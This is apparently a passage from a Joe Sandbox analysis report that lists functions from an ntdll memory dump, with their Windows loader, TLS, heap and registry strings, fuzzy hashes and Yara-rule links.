minkernel\ntdll\ldrmap.c, xrefs: 3554A59A
LdrpCompleteMapModule, xrefs: 3554A590

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 66a76a96f3db304aa63a504201c401f48cdf1ef657a2bda0a823c9f658e18095
Instruction ID: af1151c62ad25f4f0f8114cbcba0e3046034af1a824465d46aca719567058e92
Opcode Fuzzy Hash: 66a76a96f3db304aa63a504201c401f48cdf1ef657a2bda0a823c9f658e18095
Instruction Fuzzy Hash: D95101B96047809BEB11CB68CE40B4A77F6FF40754F5406A9E9529BAE1DB74F900CB81

Function 354D758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 3553AFB8
Invalid address specified to %s( %p, %p ), xrefs: 3553AFCB
HEAP[%wZ]: , xrefs: 3553AFAB

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: f3ccb3660bd846a520c0b65f6a1a13211595a8d9a63dee75d1f19facfa03b28d
Instruction ID: b005252480267e2c5ec5074b0f5298aabf40d00d61f97b5125ad1eaca95dedc5
Opcode Fuzzy Hash: f3ccb3660bd846a520c0b65f6a1a13211595a8d9a63dee75d1f19facfa03b28d
Instruction Fuzzy Hash: 1A4148B83053808FEB1ECF18C1A1BA9F7E5AF01394F5444ADD84A8B643EB75E486CB51

Function 355116CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON

Download Yara Rule

Strings

LdrpAllocateTls, xrefs: 35551B40
minkernel\ntdll\ldrtls.c, xrefs: 35551B4A
TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 35551B39

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
API String ID: 0-4274184382
Opcode ID: 2669402530ed1be17eda0de1e8bafc63c959b9b872250b6a443e5ad1982bb970
Instruction ID: 90d650aa36a55bdc0932cff0cfade614c8219c592bf0fe5ff9d2c8b0e4faa163
Opcode Fuzzy Hash: 2669402530ed1be17eda0de1e8bafc63c959b9b872250b6a443e5ad1982bb970
Instruction Fuzzy Hash: 6D419DB6E01649AFDB05CFA8C840BADBBF1FF88314F504559E406A7310EB75B901CB90

Function 3559C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 3559C212
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 3559C1C5
@, xrefs: 3559C1F1

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: ebebb6cf07ba2310c31f2d06ba90da90d32f7c9d7f5d2a18e9b323e215f66679
Instruction ID: e1766c9e0a7c1166ffcf4e69f0e38d0fd294682cba31221eb89ee0a2994a6c5d
Opcode Fuzzy Hash: ebebb6cf07ba2310c31f2d06ba90da90d32f7c9d7f5d2a18e9b323e215f66679
Instruction Fuzzy Hash: 13416F76E00209EBDF19CBD4C890FEEF7BDBB56744F50406AE545E7280D778AA448B90

Function 35574144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 35574172
@, xrefs: 35574225
LdrpResValidateFilePath Enter, xrefs: 35574160

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 99209080a5b202876edb1c2a57df0750747500b6c51202fa5a3572a34e054faf
Instruction ID: fdc983b617a876c14d778ab759763211fa45ec7ba2476ae2ef3cb3fb6ce69700
Opcode Fuzzy Hash: 99209080a5b202876edb1c2a57df0750747500b6c51202fa5a3572a34e054faf
Instruction Fuzzy Hash: 8D412372A04798CFEB16DBE4C840BADB7B9FF85380F10045AD881EB791EB75A901CB51

Function 3556B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3556B632
GlobalFlag, xrefs: 3556B68F
@, xrefs: 3556B670

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: 149d11f2a6273903930b18155db0dc2897442f0bc7cd136fbe698ef685073666
Instruction ID: d04d73fa1a0baa856862ca5595eee1750371240ca08b10262959e5467609e930
Opcode Fuzzy Hash: 149d11f2a6273903930b18155db0dc2897442f0bc7cd136fbe698ef685073666
Instruction Fuzzy Hash: 34314CB5E00259AFDB04EF94DC80EEEBBB8EF44758F500469E606E7250D774AE04CBA4

Function 35511607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

DLL "%wZ" has TLS information at %p, xrefs: 35551A40
minkernel\ntdll\ldrtls.c, xrefs: 35551A51
LdrpInitializeTls, xrefs: 35551A47

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
API String ID: 0-931879808
Opcode ID: 04d1ed71f859f1e1a07c9c7bfd224845595dc33e3ced46e26329bcfdbc371f26
Instruction ID: d1d57d6fe2b20aec84d389d317cd044f1f9e6c516dd7c0d696b2327c0a70097e
Opcode Fuzzy Hash: 04d1ed71f859f1e1a07c9c7bfd224845595dc33e3ced46e26329bcfdbc371f26
Instruction Fuzzy Hash: B531D572A10344ABFB149F58C885F5A7AF9BB80365F45059AF901B7590EB70BF01CBA0

Function 355620DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 35562104
Process initialization failed with status 0x%08lx, xrefs: 355620F3
LdrpInitializationFailure, xrefs: 355620FA

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: e13f271bf1dc4573888fd66f8aa725ad6c26e93b2755b3344a700ea251a41a2e
Instruction ID: 673e0c4f59ad41cfcf24128c6385017b1974dbdbe42bdfa65f48eee13779d001
Opcode Fuzzy Hash: e13f271bf1dc4573888fd66f8aa725ad6c26e93b2755b3344a700ea251a41a2e
Instruction Fuzzy Hash: 96F04C75A00248BBE714D708CC02F9937B8FB80758F81009AF6407B280D7F0B500CA90

Function 3558705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 355870C2

Strings

kLsE, xrefs: 355870A4

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID: kLsE
API String ID: 3446177414-3058123920
Opcode ID: 412ca496c404f4f36b688f6856709085d95a5ee03492ea7c4f593a1ce5e67c68
Instruction ID: e2a7282db1eccac9ae403d342c62113cd1fb029137858d7413206e4d653f6c34
Opcode Fuzzy Hash: 412ca496c404f4f36b688f6856709085d95a5ee03492ea7c4f593a1ce5e67c68
Instruction Fuzzy Hash: 8B411873B3636186E711AB64E884B693BE0BB80775F54051AFC51AA1C1CFB67483CBE1

Function 354F52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 354F55A3
@, xrefs: 354F5445

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: e550253f46a46689c648ad97033e561a6666b3026f003b0c0f7b79da9be7d78c
Instruction ID: 987f3be648a45d91305711cfef24466499eff913f5678acd075f42b3589c6635
Opcode Fuzzy Hash: e550253f46a46689c648ad97033e561a6666b3026f003b0c0f7b79da9be7d78c
Instruction Fuzzy Hash: 73329DB86083518BE718CF18C480BAEB7F1FF88744F50495EF9969B290E776D845CB92

Function 354E5702 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 354E5778
RtlDebugPrintTimes.NTDLL ref: 35540816

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 1d0fd073baf05b0b690e980632a2971ec713a02aa528084c39e5e3db796598de
Instruction ID: 95197488fc00faff869ae2ca36451a0eeec5b380601e119e84c29b032ceb8e21
Opcode Fuzzy Hash: 1d0fd073baf05b0b690e980632a2971ec713a02aa528084c39e5e3db796598de
Instruction Fuzzy Hash: A3318D35701B06EBE7499F64CA80E8AB7B6FF44795F505029E94157A60EBB0F831CBD0

Function 355AA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 355AA551
`, xrefs: 355AA44B

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: bb6ef79087920bedf59874e8b1d22b828cd0825408f28a310082cfdd12c5abd3
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 09C1C0722083829BEB16CF24C841B5FBBE6BFC4358F444A2DF9968B290D775E505CB91

Function 354E0CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON

Download Yara Rule

Strings

ResIdCount less than 2., xrefs: 3553EEC9
Failed to retrieve service checksum., xrefs: 3553EE56

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
API String ID: 0-863616075
Opcode ID: d571fc25619f9af5285b814ddb2cecdf83ce8ae7563c98d8d401f98bdc214880
Instruction ID: b5442af7515b1106958f398dbfa64498d9ebedc890857e3706f4387ae423deba
Opcode Fuzzy Hash: d571fc25619f9af5285b814ddb2cecdf83ce8ae7563c98d8d401f98bdc214880
Instruction Fuzzy Hash: 6FE1E1B59087849FE324CF15C440B9BBBE0BF88315F408A2EE59D9B390DB70A509CF96

Function 3555E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 3555E751
Legacy, xrefs: 3555E75A

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: d41cc1aa9a7b73dafdf8e0ca3b251ef84346b96f8429564ed8561325c96a0ec8
Instruction ID: 7a630b233f9778acaf5a529518bb224bf7f2afc3f15f0d040c812903b6e153db
Opcode Fuzzy Hash: d41cc1aa9a7b73dafdf8e0ca3b251ef84346b96f8429564ed8561325c96a0ec8
Instruction Fuzzy Hash: 6F617EB1E447589FDB14CFA8C940BADBBB5FB48350F5048AEE54AEB291DB31A900CB54

Function 354FF720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

$, xrefs: 354FF860
$, xrefs: 354FF7F6

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$
API String ID: 3446177414-233714265
Opcode ID: 779ce55d749f0374e2cf27b8517ca00481d6c39ea670e481784f74c5f9f93540
Instruction ID: 32150cfd0b874ee0bea99b85915f241726b678bac24548740eeea9ba61fa64b5
Opcode Fuzzy Hash: 779ce55d749f0374e2cf27b8517ca00481d6c39ea670e481784f74c5f9f93540
Instruction Fuzzy Hash: 5E619CB6E0474AEBEB28CFA8D580B9DB7F2BF44304F504069D5056B690DB76B981CB90

Function 355735BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Exit, xrefs: 355735FE
LdrResGetRCConfig Enter, xrefs: 355735EC

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: 2031cca89d33033f91207fa27fccfa602e51709388cd2b9f78dabd47b4715372
Instruction ID: 13a09d9dbaacd717e2e3b4813a10401162ec15c66929e712b04531f768489e25
Opcode Fuzzy Hash: 2031cca89d33033f91207fa27fccfa602e51709388cd2b9f78dabd47b4715372
Instruction Fuzzy Hash: 9131AD752087819BD301CB68D844B1AB7F4FF95764F42086DF895CB390EB71E905CB96

Function 355134B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 35552A95
RtlpInitializeAssemblyStorageMap, xrefs: 35552A90

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
API String ID: 0-2653619699
Opcode ID: c33a518ea2f1a87d75d2613fdcab84599bd5032a1f7256c7a6f070ee462d0d66
Instruction ID: 2b5b6aa9584928fba9f5eae5e02adfe8a64ad30057bd25d17db97c2c49493e6e
Opcode Fuzzy Hash: c33a518ea2f1a87d75d2613fdcab84599bd5032a1f7256c7a6f070ee462d0d66
Instruction Fuzzy Hash: 7D113AB5B04200BBFB258A58CD41F5A7AA9AB94B64F1580697D05DB240D6B4EE0087D0

Function 3551A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 3551A5E9
Cleanup Group, xrefs: 3551A5E4

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 64f7dab9923c011f9a13f5ced2e8f8612e1c21449feb75dd70a5407f15793455
Instruction ID: 50501eabf05e563fb3bbb15697c1eaace9131cb5026b1ee2a039a7b450a78f3e
Opcode Fuzzy Hash: 64f7dab9923c011f9a13f5ced2e8f8612e1c21449feb75dd70a5407f15793455
Instruction Fuzzy Hash: D8012CB2A18700AFE712CF24CD04B16BBF8E780725F01883AB948C7180E730F905CB86

Function 354EC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 354EC8C3, 354ECA40

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 757085b81a3f362f355413976631b153fae04815176b2aa0844f5ec0ba2a65e9
Instruction ID: 5f476d435eb739898eebbd2ba34d3ef4e1d1ac4a0d63b488c5fd0e0a3880dea1
Opcode Fuzzy Hash: 757085b81a3f362f355413976631b153fae04815176b2aa0844f5ec0ba2a65e9
Instruction Fuzzy Hash: 5D824B79E043189FEB18CFA9C980BEDB7B1BF48351F5181A9E859AB390DB709D41CB50

Function 3558A118 Relevance: 2.1, APIs: 1, Instructions: 591timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3558A13A

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: ee0af41f1319ffe0ea2eee1fb0450bae5f7a4a71abff7b08ffc20ba05e3975c1
Instruction ID: 6ddd28631598c8dbfd7bde626bf2129d956e05a5f18f9b50fec3aa9136cbd87c
Opcode Fuzzy Hash: ee0af41f1319ffe0ea2eee1fb0450bae5f7a4a71abff7b08ffc20ba05e3975c1
Instruction Fuzzy Hash: DE22BFB87087518BEB15CF29C050772B7F2BF44360F448859DC868B696EB75F492DBA0

Function 35532F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON

Download Yara Rule

Strings

P`vRbv, xrefs: 3553300D, 355333E4, 3553343B, 355334FE, 3553352E

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: P`vRbv
API String ID: 0-2392986850
Opcode ID: 2911c124b5d4112effea0ebb87c6051300aed0f17b38bb2763a0e9c6f93a7003
Instruction ID: 0e79f07f1f6419c159a8e396b4772f80efad75da12eca71c6ee2730502b5cfa8
Opcode Fuzzy Hash: 2911c124b5d4112effea0ebb87c6051300aed0f17b38bb2763a0e9c6f93a7003
Instruction Fuzzy Hash: 2C422BB9D0A359AEEF04CFA8D4427EDBBB1FF24350F59802AE449A7290DB74B580C750

Function 354E65D0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e5aaf5a95de446fbf9524b71b4c653eca8d704d2089338a16b96bbb3d3c5920
Instruction ID: 3e7fd71d049883bc133bfbb01d4509a5bf88f15779966e646ef7d4b17f41c5cd
Opcode Fuzzy Hash: 5e5aaf5a95de446fbf9524b71b4c653eca8d704d2089338a16b96bbb3d3c5920
Instruction Fuzzy Hash: 8EE1BD75608341CFD708CF28D490A1ABBF1FF89354F058AADE8998B351DB31E906CB92

Function 3550B2C0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON

Download Yara Rule

Strings

@[]5@[]5, xrefs: 3550B2DC

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: @[]5@[]5
API String ID: 0-384299584
Opcode ID: fc4193d1b2e928af8f9e23cb11508412827f45f14a0b4b3aa4e5fc063c69e8bd
Instruction ID: 30f4587bf8a0e8fd73df3e8f940f2c312affdfc2b18cac2ec0d71e9cfcc293ef
Opcode Fuzzy Hash: fc4193d1b2e928af8f9e23cb11508412827f45f14a0b4b3aa4e5fc063c69e8bd
Instruction Fuzzy Hash: C732A1B5E00219DBDF14CF98D890BAEBBB1FF44768F540129E805AB391E735A901CF91

